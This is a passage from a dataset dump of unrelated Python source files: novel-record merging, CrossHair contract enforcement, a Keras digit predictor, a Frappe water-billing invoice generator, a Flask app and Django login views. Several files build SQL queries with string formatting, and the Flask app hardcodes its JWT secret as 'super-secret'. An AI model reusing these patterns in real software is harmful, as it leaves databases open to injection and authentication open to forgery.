print(\"新增数据失败\")\n else:\n print(\"已经存在\")\n else:\n print(\"不存在\")\n else:\n print(\"没有相似小说\")\n except Exception as e:\n print(e)\n self.sredis.delete(\"add_new_novels\")\n\n self.sredis.delete(\"add_new_novels\")\n\n \"\"\"\n 生成的子目录信息\n source_id 站点ID\n novels_id 书籍ID\n chapter_id 章节ID\n data 列表的字典\n \"\"\"\n def add_novel_chapter_list(self,novels_id,chapter_id,data):\n\n path = \"%s%s/%s/%s/\" % (FILE_BASE, 35, novels_id,chapter_id)\n rec = os.path.exists(path)\n file_path = path + \"list.json\"\n if rec == False:\n os.makedirs(path)\n list_data = []\n else:\n with open(file_path,'r') as fr:\n list_data = json.loads(fr.read())\n\n with open(file_path,mode='w') as f:\n if rec == True:\n source_id_rel = 0\n for ival in list_data:\n if data['source_id'] == ival['source_id']:\n source_id_rel = 1\n if source_id_rel == 0:\n list_data.append(data)\n else:\n list_data.append(data)\n f.write(json.dumps(list_data,ensure_ascii=False))\n return 1\n\n \"\"\"\n 获取语新增数据\n \"\"\"\n def get_novel_neaten(self):\n if self.sredis.get(\"mage_novel_neaten\"):\n print(\"程序在进行中。请等待。。。\")\n exit()\n else:\n self.sredis.set(\"mage_novel_neaten\",1)\n #分页预加载\n lg = 0\n page_index = 0\n limit = 100\n cursor = self.mysql.cursor()\n while lg == 0:\n page = page_index * limit\n sql = \"select name_author,group_concat(novels_id) as novels_ids,max(weight) as weight from `novel_novels_neaten` GROUP BY name_author HAVING count(1) > 1 ORDER BY max(weight) asc ,count(1) desc limit %d,%d\" % (page, limit)\n cursor.execute(sql)\n novel_list = cursor.fetchall()\n lencut = len(novel_list)\n if lencut == 0 :\n lg = 1\n cursor.close()\n else:\n if novel_list:\n instr = 'insert ignore into novel_novels_gather (name_author,name_author_que,novels_ids,weight) values'\n for index,val in enumerate(novel_list,1):\n name_authot_que = hashlib.md5(val[0].encode()).hexdigest()\n if index == lencut:\n str = '(\"%s\",\"%s\",\"%s\",%d)' % (val[0], name_authot_que, val[1],val[2])\n else:\n str = '(\"%s\",\"%s\",\"%s\",%d),' % (val[0], name_authot_que, val[1],val[2])\n\n instr += str\n cursor.execute(instr)\n self.mysql.commit()\n print(\"更新第\",page_index,'页')\n page_index += 1\n self.sredis.delete(\"mage_novel_neaten\")\n def novel_neaten(self):\n if self.sredis.get(\"novel_neaten\"):\n print(\"程序在使用中。。。。\")\n exit()\n else:\n 
self.sredis.set(\"novel_neaten\",1)\n #数据整理\n cursor = self.mysql.cursor()\n #查询的信息的最大的数据\n maxsql = \"select novels_id from novel_novels_neaten order by novels_id desc limit 1\"\n cursor.execute(maxsql)\n neaten_info = cursor.fetchone()\n if neaten_info :\n neaten_novel_id = neaten_info[0]\n countsql = \"select count(1) from novel_novels where id>%d and has_content>0 limit 1\" % (neaten_novel_id)\n else:\n neaten_novel_id = ''\n countsql = \"select count(1) from novel_novels where has_content>0 limit 1\"\n\n cursor.execute(countsql)\n scount = cursor.fetchone()\n if scount:\n scount = scount[0]\n print(scount)\n pagecont = int(scount/1000)\n pagecont = pagecont+1\n for i in range(pagecont):\n self.curm_sql(neaten_novel_id,i);\n print(\"更新到分页\",i)\n cursor.close()\n self.sredis.delete(\"novel_neaten\");\n print(\"数据整理完成\")\n def curm_sql(self,neaten_novel_id=0,page=0,limit = 1000):\n page = page * 1000\n if neaten_novel_id:\n sql = \"select id,source_id,name,url,author,weight,has_content from novel_novels where id>%d and has_content>0 limit %d,%d\" % (neaten_novel_id,page,limit)\n else:\n sql = \"select id,source_id,name,url,author,weight,has_content from novel_novels where has_content>0 limit %d,%d\" %(page,limit)\n cursor = self.mysql.cursor()\n cursor.execute(sql)\n novel_list = cursor.fetchall()\n\n if novel_list:\n instr = 'insert into novel_novels_neaten (novels_id,url,source_id,name_author,count,weight,has_content) values'\n #当前的书籍总数\n novel_list_cont = len(novel_list)\n for index,val in enumerate(novel_list,1):\n name_author = \"%s$c%s\" %(val[2],val[4])\n\n if index == novel_list_cont:\n str = '(%d,\"%s\",%d,\"%s\",%d,%d)' % (val[0], val[3], val[1], name_author, 0, val[5])\n else:\n str = '(%d,\"%s\",%d,\"%s\",%d,%d),' % (val[0], val[3], val[1], name_author, 0, val[5])\n\n instr +=str\n\n cursor.execute(instr)\n self.mysql.commit()\n cursor.close()\nif __name__ == '__main__':\n # sys_name = sys.argv[1]\n r = novelMarge()\n r.get_update_novel_gather()\n # if sys_name == \"update_novel\":\n # r.get_update_novel_gather()\n # elif sys_name == \"add_new_novels\":\n # r.add_new_novels()\n # elif sys_name == \"mage_novel_neaten\":\n # r.get_novel_neaten()\n # elif sys_name == \"novel_neaten\":\n # r.novel_neaten()\n\n # 第四步 把多个章节内容合并成list.json 格式\n # self.get_update_novel_gather()\n # 第三步 合并出新的书籍 创建新书籍\n # self.add_new_novels()\n # 第二部要合并数据缓存\n # self.get_novel_neaten()\n # 第一步 项目执行次数\n # self.novel_neaten()\n\n","sub_path":"novel_merge_duo.py","file_name":"novel_merge_duo.py","file_ext":"py","file_size_in_byte":28329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"212538030","text":"import builtins\nimport contextlib\nimport copy\nimport inspect\nimport functools\nimport sys\nimport traceback\nimport types\nfrom typing import *\nfrom crosshair.condition_parser import fn_globals\nfrom crosshair.condition_parser import Conditions\nfrom crosshair.condition_parser import ClassConditions\nfrom crosshair.condition_parser import ConditionParser\nfrom crosshair.util import IdentityWrapper\nfrom crosshair.util import AttributeHolder\nfrom crosshair.util import debug\n\nclass PreconditionFailed(BaseException):\n pass\n\n\nclass PostconditionFailed(BaseException):\n pass\n\n\ndef is_singledispatcher(fn: Callable) -> bool:\n return hasattr(fn, 'registry') and isinstance(fn.registry, Mapping) # type: ignore\n\n\ndef EnforcementWrapper(fn: Callable, conditions: Conditions, enforced: 'EnforcedConditions') -> Callable:\n signature = conditions.sig\n\n def wrapper(*a, **kw):\n fns_enforcing = enforced.fns_enforcing\n if fns_enforcing is None or fn in fns_enforcing:\n return fn(*a, **kw)\n #debug('Calling enforcement wrapper ', fn, signature, 'with', a, kw)\n bound_args = signature.bind(*a, **kw)\n bound_args.apply_defaults()\n old = {}\n mutable_args = conditions.mutable_args\n mutable_args_remaining = set(mutable_args) if mutable_args is not None else set()\n for argname, argval in bound_args.arguments.items():\n try:\n old[argname] = copy.copy(argval)\n except Exception as exc:\n pass\n if argname in mutable_args_remaining:\n mutable_args_remaining.remove(argname)\n if mutable_args_remaining:\n raise PostconditionFailed('Unrecognized mutable argument(s) in postcondition: \"{}\"'.format(\n ','.join(mutable_args_remaining)))\n with enforced.currently_enforcing(fn):\n for precondition in conditions.pre:\n #debug(' precondition eval ', precondition.expr_source)\n # TODO: is fn_globals required here?\n args = {**fn_globals(fn), **bound_args.arguments}\n if not precondition.evaluate(args):\n raise PreconditionFailed(\n f'Precondition \"{precondition.expr_source}\" was not satisfied '\n f'before calling \"{fn.__name__}\"')\n ret = fn(*a, **kw)\n with enforced.currently_enforcing(fn):\n lcls = {**bound_args.arguments, '__return__': ret,\n '_': ret, '__old__': AttributeHolder(old)}\n args = {**fn_globals(fn), **lcls}\n for postcondition in conditions.post:\n #debug(' postcondition eval ', postcondition.expr_source, fn, lcls['_'])\n if postcondition.evaluate and not postcondition.evaluate(args):\n raise PostconditionFailed('Postcondition failed at {}:{}'.format(\n postcondition.filename, postcondition.line))\n #debug('Completed enforcement wrapper ', fn)\n return ret\n functools.update_wrapper(wrapper, fn)\n return wrapper\n\n\nclass EnforcedConditions:\n def __init__(self,\n condition_parser: ConditionParser,\n *envs: Mapping[str, object],\n interceptor=lambda x: x):\n self.condition_parser = condition_parser\n self.envs = envs\n self.interceptor = interceptor\n self.fns_enforcing: Optional[Set[Callable]] = set()\n self.wrapper_map: Dict[object, Callable] = {}\n self.original_map: Dict[IdentityWrapper[object], object] = {}\n\n def _wrap_class(self, cls: type) -> None:\n if not self.condition_parser.get_class_conditions(cls).has_any():\n return\n #debug('wrapping class ', cls)\n for superclass in cls.mro():\n super_conditions = self.condition_parser.get_class_conditions(superclass)\n if super_conditions.has_any():\n self._wrap_class_members(superclass, super_conditions)\n\n def _wrap_class_members(self, cls: type, class_conditions: ClassConditions) -> None:\n 
method_conditions = dict(class_conditions.methods)\n for method_name, method in list(cls.__dict__.items()):\n # Note that `method` is post-property resolution. Also grab the raw member:\n raw_method = cls.__dict__.get(method_name)\n if raw_method is None: # likely defined on a superclass\n continue\n conditions = method_conditions.get(method_name)\n if conditions is None:\n continue\n if isinstance(raw_method, (staticmethod, classmethod)):\n inner_wrapper = self._wrap_fn(raw_method.__func__, raw_fn=raw_method, conditions=conditions)\n wrapper: object = type(raw_method)(inner_wrapper)\n self.original_map[IdentityWrapper(wrapper)] = raw_method\n else:\n wrapper = self._wrap_fn(method, raw_fn=raw_method, conditions=conditions)\n setattr(cls, method_name, wrapper)\n\n def _transform_singledispatch(self, fn, transformer):\n overloads = list(fn.registry.items())\n wrapped = functools.singledispatch(transformer(overloads[0][1]))\n for overload_typ, overload_fn in overloads[1:]:\n wrapped.register(overload_typ)(transformer(overload_fn))\n return wrapped\n\n def is_enforcement_wrapper(self, value):\n return IdentityWrapper(value) in self.original_map\n\n @contextlib.contextmanager\n def currently_enforcing(self, fn: Callable):\n if self.fns_enforcing is None:\n yield None\n else:\n self.fns_enforcing.add(fn)\n try:\n yield None\n finally:\n self.fns_enforcing.remove(fn)\n\n @contextlib.contextmanager\n def disabled_enforcement(self):\n prev = self.fns_enforcing\n assert prev is not None\n self.fns_enforcing = None\n try:\n yield None\n finally:\n self.fns_enforcing = prev\n\n @contextlib.contextmanager\n def enabled_enforcement(self):\n prev = self.fns_enforcing\n assert prev is None\n self.fns_enforcing = set()\n try:\n yield None\n finally:\n self.fns_enforcing = prev\n\n def __enter__(self):\n next_envs = [env.copy() for env in self.envs]\n for env, next_env in zip(self.envs, next_envs):\n for (k, v) in env.items():\n if isinstance(v, (types.FunctionType, types.BuiltinFunctionType)):\n if is_singledispatcher(v):\n wrapper = self._transform_singledispatch(\n v, self._wrap_fn)\n else:\n wrapper = self._wrap_fn(v)\n if wrapper is v:\n continue\n next_env[k] = wrapper\n elif isinstance(v, type):\n self._wrap_class(v)\n for env, next_env in zip(self.envs, next_envs):\n env.update(next_env)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n next_envs = [env.copy() for env in self.envs]\n for env, next_env in zip(self.envs, next_envs):\n for (k, v) in list(env.items()):\n next_env[k] = self._unwrap(v)\n for env, next_env in zip(self.envs, next_envs):\n env.update(next_env)\n return False\n\n def _unwrap(self, value):\n if self.is_enforcement_wrapper(value):\n return self.original_map[IdentityWrapper(value)]\n elif is_singledispatcher(value):\n return self._transform_singledispatch(value, self._unwrap)\n elif isinstance(value, type):\n self._unwrap_class(value)\n return value\n\n def _unwrap_class(self, cls: type):\n for method_name, method in list(cls.__dict__.items()):\n if self.is_enforcement_wrapper(method):\n setattr(cls, method_name,\n self.original_map[IdentityWrapper(method)])\n\n def _wrap_fn(self, fn: Callable,\n raw_fn: object = None,\n conditions: Optional[Conditions] = None) -> Callable:\n # `raw_fn` is the unresolved descriptor, as appropriate.\n if raw_fn is None:\n raw_fn = fn\n wrapper = self.wrapper_map.get(raw_fn)\n if wrapper is not None:\n return wrapper\n conditions = conditions or self.condition_parser.get_fn_conditions(fn)\n if conditions and 
conditions.has_any():\n wrapper = EnforcementWrapper(\n self.interceptor(fn), conditions, self)\n functools.update_wrapper(wrapper, fn)\n else:\n wrapper = fn\n self.wrapper_map[raw_fn] = wrapper\n self.original_map[IdentityWrapper(wrapper)] = raw_fn\n return wrapper\n","sub_path":"crosshair/enforce.py","file_name":"enforce.py","file_ext":"py","file_size_in_byte":8880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"404056141","text":"from keras.models import model_from_yaml\nimport numpy as np\nfrom diploma_two import y_test, X_test, X_train\nimport cv2\n\nyaml_file = open('diplomaTwo.yaml', 'r')\nloaded_model_yaml = yaml_file.read()\nyaml_file.close()\n\nloaded_model = model_from_yaml(loaded_model_yaml)\nloaded_model.load_weights(\"diplomaTwo.h5\")\nprint(\"Loaded model from disk\")\n\n# evaluate loaded model on test data\nloaded_model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\nscore = loaded_model.evaluate(X_test, y_test, verbose=0)\nprint(\"%s: %.2f%%\" % (loaded_model.metrics_names[1], score[1]*100))\n\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\ndef inverte(imagem, name):\n imagem = (255-imagem)\n cv2.imwrite(name, imagem)\n\nname = '0'\npixels = 784\n\nimg = cv2.imread(\"test_images/\" + name + \".jpg\")\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ncv2.imwrite(\"test_images/\" + name + \".jpg\", img)\nimg = cv2.imread(\"test_images/\" + name + \".jpg\")\n\narrayPix = np.asarray(img)\nprint(arrayPix.shape, ',', X_train.shape[0], ',', arrayPix.shape[0])\narrayPix = arrayPix.reshape(3, 28, 28)\n# arrayPix = arrayPix.reshape(1, 784)\n# X_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')\narrayPix = arrayPix.reshape(3, 1, 28, 28)\na = loaded_model.predict(arrayPix)\nprint(a)\na = a.argmax()\nprint(a)\nprint('B\\n', 'B\\n', 'Y\\n')","sub_path":"diploma_two_run.py","file_name":"diploma_two_run.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"427547","text":"import pytest\nfrom django.http.request import QueryDict\n\nfrom byro.common.templatetags.url_replace import url_replace\n\n\nclass request:\n def __init__(self, get):\n self.GET = QueryDict(get)\n\n\n@pytest.mark.parametrize('GET,key,value,expected', (\n ('foo=bar', 'foo', 'baz', ['foo=baz']),\n ('foo=bar', 'fork', 'baz', ['foo=bar', 'fork=baz']),\n))\ndef test_templatetag_url_replace(GET, key, value, expected):\n result = url_replace(request(GET), key, value)\n assert all(e in result for e in expected)\n","sub_path":"src/tests/unit/test_common_templatetags.py","file_name":"test_common_templatetags.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"416193936","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2018, Paul Karugu and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\n\nclass MeterReadingCapture(Document):\n\t'''\n\tThis is the Meter Reading Sheet Capture\n\tController class\n\t'''\n\tsales_invoice_items_holder = []\n\n\tdef validate(self):\n\t\t'''\n\t\tchecks\n\t\t'''\n\t\tpass\n\n\t\n\tdef on_update(self):\n\t\t'''\n\t\tFunction that runs when the document is saved\n\t\t'''\n\t\t# collect all required meter reading sheet items \n\t\tsales_invoice_items_list = self.get_meter_reading_sheet_items()\n\t\n\t\t# create sales invoices\n\t\tcreate_new_sales_invoice(sales_invoice_items_list)\n\n\tdef on_trash(self):\n\t\tpass\n\n\tdef get_meter_reading_sheet_items(self):\n\t\t'''\n\t\tFunction that gets all customers and their details\n\t\tfrom the meter reading sheet of the document\n\t\targ:\n\t\t\tself\n\t\toutput:\n\t\t\t{\"status\":True \"message\":[[list of items],...,[..]]}\n\t\t\tor\n\t\t\t{\"status\":True/False,\"message\":failure message}\n\t\t'''\n\t\t# initialize the sales_invoice_items_holder as empty\n\t\tsales_invoice_items_holder = []\n\t\t# loop through all the items in the meter reading sheet\n\t\tfor meter_reading in self.meter_reading_sheet:\n\t\t\t# get required details\n\t\t\tsales_invoice_details = {}\n\n\t\t\t# get area and zone for current root\n\t\t\tarea_and_zone = get_zone_and_area_using_route(self.route)\n\t\t\n\t\t\tsales_invoice_details[\"customer\"] = meter_reading.customer_name\n\t\t\tsales_invoice_details[\"billing_period\"] = self.billing_period\n\t\t\tsales_invoice_details[\"route\"] = self.route\n\t\t\tsales_invoice_details[\"area\"] = area_and_zone[\"area\"]\n\t\t\tsales_invoice_details[\"zone\"] = area_and_zone[\"zone\"]\n\t\t\tsales_invoice_details[\"previous_reading\"] = meter_reading.previous_manual_reading\n\t\t\tsales_invoice_details[\"current_reading\"] = meter_reading.current_manual_readings\n\t\t\tsales_invoice_details[\"consumption\"] = meter_reading.manual_consumption\n\t\t\tsales_invoice_details[\"type_of_bill\"] = \"Actual\"\n\n\t\t\t# get the disconnection profile for current customer\n\t\t\tfound_customer_group = meter_reading.type_of_customer\n\t\t\tcurrent_disconnection_profile = get_disconnection_profile(found_customer_group)\n\n\t\t\tsales_invoice_details[\"disconnection_profile\"] = current_disconnection_profile\n\t\t\tsales_invoice_details[\"type_of_customer\"] = found_customer_group\n\t\t\tsales_invoice_details[\"customer_type\"] = meter_reading.customer_type\n\t\t\tsales_invoice_details[\"type_of_invoice\"] = \"Bill\"\n\t\t\tsales_invoice_details[\"reading_code\"] = meter_reading.reading_code\n\n\n\t\t\t# append the dictionary to sales_invoice_items_holder\n\t\t\tsales_invoice_items_holder.append(sales_invoice_details)\n\t\t\n\t\treturn sales_invoice_items_holder\n\ndef create_new_sales_invoice(list_of_sales_invoice_details):\n\t'''\n\tFunction that creates a new sales invoice for meter \n\treading a meter reading sheet\n\t'''\n\t# create invoices\n\tfor list_item in list_of_sales_invoice_details:\n\t\tdoc = frappe.get_doc({\"doctype\":\"Sales Invoice\"})\n\t\tdoc.customer = list_item[\"customer\"]\n\t\tdoc.billing_period = list_item[\"billing_period\"]\n\t\tdoc.route = list_item[\"route\"]\n\t\tdoc.area = list_item[\"area\"]\n\t\tdoc.zone = list_item[\"zone\"]\n\t\tdoc.previous_reading = 
list_item[\"previous_reading\"]\n\t\tdoc.current_reading = list_item[\"current_reading\"]\n\t\tdoc.consumption = list_item[\"consumption\"]\n\t\tdoc.type_of_bill = list_item[\"type_of_bill\"]\n\t\tdoc.disconnection_profile = list_item[\"disconnection_profile\"][\"disconnection_name\"]\n\t\tdoc.type_of_customer = list_item[\"type_of_customer\"]\n\t\tdoc.customer_type = list_item[\"customer_type\"]\n\t\tdoc.type_of_invoice = list_item[\"type_of_invoice\"]\n\n\t\t# check reading code\n\t\tif(list_item[\"customer_type\"] == \"Flat\"):\n\t\t\t# its reading code should always be normal\n\t\t\tif(list_item[\"reading_code\"] == \"Normal Reading\"):\n\t\t\t\t# set consumption to None and instead set estimated consumption\n\t\t\t\tdoc.estimated_consumption = list_item[\"consumption\"]\n\t\t\t\tdoc.consumption = None\n\t\t\telse:\n\t\t\t\tfrappe.throw(\"Customer {} is a Flat Rate Customer hence the Reading Code Should be Normal\".format(list_item[\"customer\"]))\n\t\telif(list_item[\"customer_type\"] == \"Metered\"):\n\t\t\t# just take the consumption but check for meter status\n\t\t\tif(list_item[\"reading_code\"] == \"Normal Reading\"):\n\t\t\t\tpass\n\n\t\t\telif(list_item[\"reading_code\"] == \"Meter Stuck\"):\n\t\t\t\t# set consumption to None and instead set estimated consumption \n\t\t\t\tdoc.estimated_consumption = list_item[\"consumption\"]\n\t\t\t\tdoc.consumption = None\t\n\t\t\telse:\n\t\t\t\tfrappe.throw(\"An Error Occured with the Reading Code\")\n\t\telse:\n\t\t\tfrappe.throw(\"An Error Occured With Customer Type\")\n\t\t\n\n\t\t# get applicable items\n\t\tapplicable_tarrifs = get_applicable_tariff(list_item[\"type_of_customer\"],\"Tariff\",list_item[\"consumption\"])\n\t\tapplicable_rent = get_applicable_rent(list_item[\"type_of_customer\"],\"Meter Rent\")\n\t\t\n\t\t# loop throught applicable tarrifs\n\t\titems_and_quantities = loop_through_tariffs(applicable_tarrifs,list_item[\"consumption\"])\n\t\t# Add applicable tarrif rates\n\t\tfor item in items_and_quantities:\n\t\t\tdoc.append(\"items\", {\n\t\t\t\t\"item_code\": item[\"name\"],\n\t\t\t\t\"qty\": item[\"qty\"],\n\t\t\t\t'description': \"Monthly Bill\",\n\t\t\t\t'uom':'Nos',\n\t\t\t\t'conversion_factor': 1.0,\n\t\t\t\t'income_account': 'Sales - VW',\n\t\t\t\t'cost_center': 'Main - VW'\n\t\t\t})\n\t\t# add applicable meter rent\n\t\tif(list_item[\"customer_type\"] == \"Flat\"):\n\t\t\t# no meter rent applies hence pass\n\t\t\tpass\n\t\telif(list_item[\"customer_type\"] == \"Metered\"):\n\t\t\tname_of_rent_item = applicable_rent[0][0]\n\t\t\tdoc.append(\"items\",{\n\t\t\t\t\t\"item_code\": name_of_rent_item,\n\t\t\t\t\t\"qty\": 1,\n\t\t\t\t\t'description': \"Monthly Bill\",\n\t\t\t\t\t'uom':'Nos',\n\t\t\t\t\t'conversion_factor': 1.0,\n\t\t\t\t\t'income_account': 'Sales - VW',\n\t\t\t\t\t'cost_center': 'Main - VW'\n\t\t\t})\n\t\telse:\n\t\t\tfrappe.throw(\"Something Went Wrong While Determining Applicable Meter Rent\")\n\n\t\t# check if the sales invoice already exist\n\t\tcheck_if_sales_invoice_exist(list_item[\"customer\"],list_item[\"billing_period\"])\n\t\t# save the invoice\n\t\tdoc.insert()\n\t\t#submit the invoice\n\t\tdoc.submit()\n\n\ndef get_zone_and_area_using_route(name_of_route):\n\t'''\n\tFunction that gets the zone and area under which\n\ta given route lies\n\t'''\n\t# get area\n\troute_doc =frappe.get_doc(\"Territory\", name_of_route)\n\troute_zone = route_doc.parent_territory\n\tzone_doc = frappe.get_doc(\"Territory\", route_zone)\n\troute_area = zone_doc.parent_territory\n\treturn 
{\"zone\":route_zone,\"area\":route_area}\n\ndef get_disconnection_profile(customer_type):\n\t'''\n\tFunction that get the disconnection profile based on the \n\ttype of customer given\n\t'''\n\tdisconnection_profile = frappe.get_list(\"Disconnection Profile\",\n\t\tfields=[\"*\"],\n\t\tfilters = {\n\t\t\t\"customer_group\":customer_type\n\t})\n\n\tif(len(disconnection_profile)!=0):\n\t\treturn disconnection_profile[0]\n\telse:\n\t\tfail_message = \"No Disconnection Profile for Customer Type {}\".format(customer_type)\n\t\tfrappe.throw(fail_message)\n\ndef loop_through_tariffs(applicable_tarrifs,consumption):\n\tlist_of_tariffs = []\n\t# get the first item in the list\n\t\n\tif(len(applicable_tarrifs)==1):\n\t\t# get first item\n\t\tkey_value_holder = {}\n\t\tfirst_item = applicable_tarrifs[:1]\n\t\tkey_value_holder[\"name\"]=first_item[0][0]\n\t\tkey_value_holder[\"qty\"]=1\n\t\tlist_of_tariffs.append(key_value_holder)\n\t\treturn list_of_tariffs\n\n\telif(len(applicable_tarrifs)==2):\n\t\t# get first item\n\t\tkey_value_holder = {}\n\t\tfirst_item = applicable_tarrifs[:1]\n\t\tkey_value_holder[\"name\"]=first_item[0][0]\n\t\tkey_value_holder[\"qty\"]=1\n\t\tlist_of_tariffs.append(key_value_holder)\n\n\t\t# get last item\n\t\tkey_value_holder = {}\n\t\tlast_item = applicable_tarrifs[len(applicable_tarrifs)-1:]\n\t\tunits_within_category = (int(consumption) - last_item[0][2]) +1\n\t\tkey_value_holder[\"name\"]=last_item[0][0]\n\t\tkey_value_holder[\"qty\"]=units_within_category\n\t\tlist_of_tariffs.append(key_value_holder)\n\t\treturn list_of_tariffs\n\n\telif(len(applicable_tarrifs)>2):\n\t\t# get first item\n\t\tkey_value_holder = {}\n\t\tfirst_item = applicable_tarrifs[:1]\n\t\tkey_value_holder[\"name\"]=first_item[0][0]\n\t\tkey_value_holder[\"qty\"]=1\n\t\tlist_of_tariffs.append(key_value_holder)\n\n\t\t# get middle items\n\t\tmiddle_items = (applicable_tarrifs[1:len(applicable_tarrifs)-1])\n\t\tfor item in middle_items:\n\t\t\tkey_value_holder = {}\n\t\t\tkey_value_holder[\"name\"]=item[0]\n\t\t\tkey_value_holder[\"qty\"]=item[1]\n\t\t\tlist_of_tariffs.append(key_value_holder)\n\t\n\t\t# get last item\n\t\tkey_value_holder = {}\n\t\tlast_item = applicable_tarrifs[len(applicable_tarrifs)-1:]\n\t\tunits_within_category = (int(consumption) - last_item[0][2]) +1\n\t\tkey_value_holder[\"name\"]=last_item[0][0]\n\t\tkey_value_holder[\"qty\"]=units_within_category\n\t\tlist_of_tariffs.append(key_value_holder)\n\t\treturn list_of_tariffs\n\n\ndef get_applicable_tariff(type_of_customer,type_of_item,consumption):\n\t'''\n\tFunction that get all the applicable items Tariffs\n\tbased on the type of customer\n\t'''\n\t# get the applicable tarrifs based on the consumption\n\tapplicable_tariffs = frappe.db.sql(\"\"\"SELECT name,difference_btw_max_and_min,min_quantity from `tabItem` WHERE type_of_customer = '{}' AND type_of_item = '{}' and min_quantity <= {} ORDER BY min_quantity \"\"\".format(type_of_customer,type_of_item,consumption))\n\tif(len(applicable_tariffs) == 0):\n\t\tfrappe.throw(\"No Tarrifs Exist for customer type {}\".format(type_of_customer))\n\telse:\n\t\treturn applicable_tariffs\n\ndef get_applicable_rent(type_of_customer,type_of_item):\n\t'''\n\tFunction that get all the applicable Meter Rent\n\tbased on the type of customer\n\t'''\n\t# get applicable meter rent based on type_of_customer\n\tapplicable_meter_rent = frappe.db.sql(\"\"\"SELECT name from `tabItem` WHERE type_of_customer = '{}' AND type_of_item = 
'{}'\"\"\".format(type_of_customer,type_of_item))\n\tif(len(applicable_meter_rent) == 0):\n\t\tfrappe.throw(\"No Meter Rent Costs Exist for customer type {}\".format(type_of_customer))\n\telse:\n\t\treturn applicable_meter_rent\n\t\t\n\ndef check_if_sales_invoice_exist(customer_name,billing_period):\n\t'''\n\tFunction that checks if a given billing period has \n\talready been created\n\t'''\n\tduplicate_sales_invoices = frappe.get_list(\"Sales Invoice\",\n\t\tfields=[\"*\"],\n\t\tfilters = {\n\t\t\t\"customer\":customer_name,\n\t\t\t\"billing_period\":billing_period\n\t})\n\n\tif(len(duplicate_sales_invoices)==0):\n\t\tpass\n\telse:\n\t\tfail_message = \"A Sales invoice for {} for customer {} Already Exist\".format(billing_period,customer_name)\n\t\tfrappe.throw(fail_message)\n\t\n\t\n","sub_path":"washmis_erp/washmis_erp/doctype/meter_reading_capture/meter_reading_capture.py","file_name":"meter_reading_capture.py","file_ext":"py","file_size_in_byte":10207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"100710649","text":"from flask import Flask, request as req\nfrom flask_jwt_extended import (\n JWTManager, jwt_required, create_access_token,\n get_jwt_identity\n)\nfrom app.views import views\n\n# se crea el microfamework flask\napp = Flask(__name__)\napp.register_blueprint(views.blueprint)\napp.config['JWT_SECRET_KEY'] = 'super-secret' \njwt = JWTManager(app)\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"250989803","text":"import os, sys\nimport numpy as np\n\nfrom molmass import *\nfrom elements import ELEMENTS\n\nif __name__ == \"__main__\":\n cp = {\"N2\": 0.78084,\n \"O2\": 0.20946,\n \"Ar\": 0.0934,\n \"CO2\": 0.00041332,\n \"CH4\": 0.00000114}\n\n ep = {}\n for mol, bw in cp.items():\n f = Formula(mol)\n molc = f.composition()\n for el in molc:\n if el[0] not in ep.keys():\n ep[el[0]] = 0.0\n\n #ep[el[0]] += el[2] * bw / ELEMENTS[el[0]].mass\n ep[el[0]] += bw * el[1]\n\n ntot = 0\n for e, n in ep.items():\n ntot += n\n\n for e, n in ep.items():\n print(f\"{e}: {n/ntot:8.7f}\")","sub_path":"util/comp_help.py","file_name":"comp_help.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"8600081","text":"from __future__ import print_function, unicode_literals, division, absolute_import\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseForbidden, HttpResponseRedirect\nimport django.contrib.auth\nimport datetime\nimport flat.settings as settings\nimport flat.comm\nimport flat.users\nimport urllib2\nimport os\n\ndef login(request):\n if 'username' in request.POST and 'password' in request.POST:\n username = request.POST['username']\n password = request.POST['password']\n request.session['configuration'] = request.POST['configuration']\n user = django.contrib.auth.authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n django.contrib.auth.login(request, user)\n # Redirect to a success page.\n if 'next' in request.POST:\n return redirect(\"/\" + request.POST['next'])\n elif 'next' in request.GET:\n return redirect(\"/\" + request.GET['next'])\n else:\n return redirect(\"/\")\n else:\n # Return a 'disabled account' error message\n return render(request, 'login.html', {'error': \"This account is disabled\",\"defaultconfiguration\":settings.DEFAULTCONFIGURATION, \"configurations\":settings.CONFIGURATIONS , 'version': settings.VERSION} )\n else:\n # Return an 'invalid login' error message.\n return render(request, 'login.html', {'error': \"Invalid username or password\",\"defaultconfiguration\":settings.DEFAULTCONFIGURATION, \"configurations\":settings.CONFIGURATIONS, 'version': settings.VERSION} )\n else:\n return render(request, 'login.html',{\"defaultconfiguration\":settings.DEFAULTCONFIGURATION, \"configurations\":settings.CONFIGURATIONS})\n\n\ndef logout(request):\n if 'configuration' in request.session:\n del request.session['configuration']\n django.contrib.auth.logout(request)\n return redirect(\"/login\")\n\n\ndef register(request):\n if request.method == 'POST':\n form = django.contrib.auth.forms.UserCreationForm(request.POST)\n if form.is_valid():\n new_user = form.save()\n return HttpResponseRedirect(\"/login/\")\n else:\n form = django.contrib.auth.forms.UserCreationForm()\n return render(request, \"register.html\", {\n 'form': form,\n })\n\n\n\n@login_required\ndef index(request):\n docs = {}\n try:\n namespaces = flat.comm.get(request, '/getnamespaces/', False)\n except urllib2.URLError:\n return HttpResponseForbidden(\"Unable to connect to the document server\")\n if not request.user.username in namespaces['namespaces']:\n 